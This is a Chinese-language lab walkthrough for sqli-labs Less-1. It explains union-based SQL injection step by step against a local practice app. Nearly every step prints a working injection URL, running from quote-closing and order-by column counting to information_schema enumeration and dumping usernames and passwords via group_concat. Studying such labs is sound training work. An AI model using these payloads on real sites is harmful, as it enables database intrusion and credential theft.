sqli-labs--Less1-union select 联合查询注入
在学习之前,我们要知道,什么是 SQL 注入?
一句话来说,攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
SQL注入漏洞的危害是很大的,常常会导致整个数据库信息泄露,SQL注入也是最常见的Web漏洞之一。
联合查询注入的基本思路
1.判断是否存在注入点,是字符型注入还是数字型注入
2.order by 猜解 SQL 查询语句中的字段数
3.union select 确认显示字段的顺序(哪一个字段回显内容)
4.获取当前数据库
5.获取数据库中的表名
6.获取数据表中的列名(字段名)
7.获取字段的数据(获取到数据库信息,下载内容)
1.判断注入是否存在注入点,是字符型,还是数字型。
使用
http://localhost/sqli-labs-master/Less-1/?id=1
和http://localhost/sqli-labs-master/Less-1/?id=1a
来进行判断
因为数字型注入的话,如果是
1a
的话会报错
,字符型的话1a
是正常解析的。
可以看出是一个字符型注入,字符型注入需要我们手动进行闭合,已达到破坏 sql 语句的效果
判断是否存在注入点,使用
'
和"
引号尝试进行闭合破坏 SQl 语句
在输入1'
闭合后,提示语法错误,存在注入点
注意:这里的 %27 是 url编码,chrome 浏览器会自动对 url 进行编码, %27 解码后就是单引号
常见的 URL 编码有:%20 空格 %3F 问号 %27 单引号 %28 %39 左右括号 %22 双引号
2.猜解 SQL 查询语句中的字段数
由于是联合查询注入,
union select 联合查询语句的条件是需要和第一个 select 查询语句的字段数相同
所以需要猜解第一个查询语句中字段的数量,使用order by
order by 会根据指定的列进行排序,若没有这个列,语句执行报错显示没有这个字段,所以我们可以通过报错来判断拥有几个列
可以看出我们一共查询了两个字段的内容,order by 值为 3 的时候,语句报错了,同理
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=1' order by 1 --+
注意:--+ 经过转移为了 -- ,在 SQL 语句中 -- 是注释的意思。
常用的注释也有 # 号 --+ --
正常
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=1' order by 2 --+
正常
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=1' order by 3 --+
正常
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=1' order by 4 --+
报错,所以,第一个语句使用了三个列(三个字段),在测试中可是直接输入100来判断语句是否错误,然后慢慢缩小猜解
3.确认字段显示顺序,看一看那个字段可以回显我们查询的值
使用 union select 联合查询进行测试
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=1' union select 1,2,3 --+
并没有任何回显,是因为第一个查询语句把所有站位都使用了,所以我们需要把第一个查询语句查询失败
可以使用 and 1=2 或者 id = -1 来进行查询错误
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=1' and 1=2 union select 1,2,3 --+
和http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,2,3 --+
这两句回显的结果都是一样的,发现 2 和 3 可以返回查询结果
4.获取当前数据库和当前用户(现在我们就可以执行 select 查询语句了)
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,user(),database() --+
获取到当前数据库名为 security ,用户为 root@localhost。也可以查询数据库版本,数据库存储路径等
version(),@@datadir
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,version(),@@datadir --+
获取到当前数据库版本为 5.7.26,路径为 C:\phpstudy_pro\Extensions\MySQL5.7.26\data\
5.使用 information_schema 数据库下的 tables 表来查询 security 数据库中的表
mysql 中默认有 information_schema 数据库,记录的有所有数据库的所有信息,其中 tables 记录着所有数据库的表名
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='security' --+
使用 table_schema 列来进行筛选 security 数据库的表名
查询成功,但是只返回了一个表名,这里可以使用到 MySQL 中的一个函数group_concat()
可以看出,group_concat()
函数会将所有的查询结果返回到一行一列中,其中每行之间使用,
号隔开
使用 group_concat() 函数进行测试:http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
可以发现,在 security 数据库下有emails,referers,uagents,users
这几个表,一看就知道用户名密码在 users 表下
6.使用 information_schema 数据库下的 columns 表来查询 security 数据库下的 users 表的字段名
columns 表记录着所有表的字段名
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
可以看到有id,username,password
这三个字段
7.获取字段内容
我们当前在 security 数据库下,可以直接查询 users 表 字段的内容。
测试:http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,group_concat(username,'~',password),3 from users--+
成功获取数据库用户名和密码。
由于 group_concat 列之间没有间隔,我们在 username 和 password 的之间添加了一个 ~ 作为占位符